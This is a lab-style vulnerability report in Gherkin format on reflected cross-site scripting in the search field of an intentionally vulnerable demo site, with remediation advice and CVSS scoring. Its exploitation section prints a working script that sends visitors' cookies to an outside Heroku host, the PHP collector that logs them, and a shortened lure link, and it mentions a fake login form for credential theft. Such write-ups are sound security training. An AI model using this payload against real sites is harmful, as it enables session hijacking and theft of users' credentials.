## Version 1.4.1
## language: en

Feature:
  TOE:
    Acuforum
  Category:
    Improper input validation
  Location:
    http://testasp.vulnweb.com/Search.asp?tfSearch=0 - search (field)
  CWE:
    CWE-20: Improper input validation
    https://cwe.mitre.org/data/definitions/20.html
  Rule:
    REQ.173: https://fluidattacks.com/web/rules/173/
  Goal:
    Detect and exploit improper input validation in the search page
  Recommendation:
    Always validate and sanitize the inputs fields

  Background:
  Hacker's software:
    | <Software name>   | <Version>       |
    | Ubuntu            | 18.04.3 LTS     |
    | Firefox           | 69.0            |
  TOE information:
    Given I am accessing an "ASP.NET" website
    And the server is running Microsoft SQL Server version 8.5

  Scenario: Normal use case
    When I enter some values in the search field
    Then I can see the results of my search

  Scenario: Static detection
    When I don't have access to source code
    Then I can't do the static detection

  Scenario: Dynamic detection
    When I use HTML code in the search field
    Then I can post it without client-side validation [evidence](img1.png)
    """
    <h1>hello</h1>
    """
    And I can conclude that it can be affected by improper input validation

  Scenario: Exploitation
    When I use some JavaScript code in the search field
    Then I can create a JavaScript injection
    """
    <script>
    document.location=
    "https://thawing-badlands-08862.herokuapp.com/cookiestealer.php?c="
    +document.cookie;
    </script>
    """
    And I use a simple "Heroku web app"
    """
    https://thawing-badlands-08862.herokuapp.com/cookiestealer.php
    """
    And I use a PHP code to store the cookies and redirect to Google website
    """
    <?php
    header ('Location:https://google.com');
            $cookies = $_GET["c"];
            $file = fopen('log.txt', 'a');
            fwrite($file,$cookies . "\n\n")
    ?>
    https://thawing-badlands-08862.herokuapp.com/log.txt
    """
    And I can send a link to someone and steal his cookies [evidence](img2.png)
    """
    https://bit.ly/2n419Mz
    """
    And I can conclude that it can be affected by improper input validation

  Scenario: Remediation
    Given the website is using an insecure form against cross site scripting
    When I input a value it must be inserted only if it is trusted Data
    And It must escape all special characters
    And It must escape all untrusted data based on the body,js,CSS and url
    And It must use White-List input validation
    And It must use OWASP auto-sanitization library
    And It must use OWASP content security policy
    And It must use output validation

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    5.4/10 (Medium) - AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
  Temporal: Attributes that measure the exploit's popularity and fiabilty
    5.2/10 (Medium) - E:H/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    5.2/10 (Medium) - CR:M/IR:M

  Scenario: Correlations
    vbd/acuforum/0080-iframe-injection
      Given I can create an HTML tag in the search page
      And I can create an iframe tag provided by 0080-iframe-injection
      When someone visits a link provided by me
      Then I can render a custom fake login form
      And I can steal the credentials
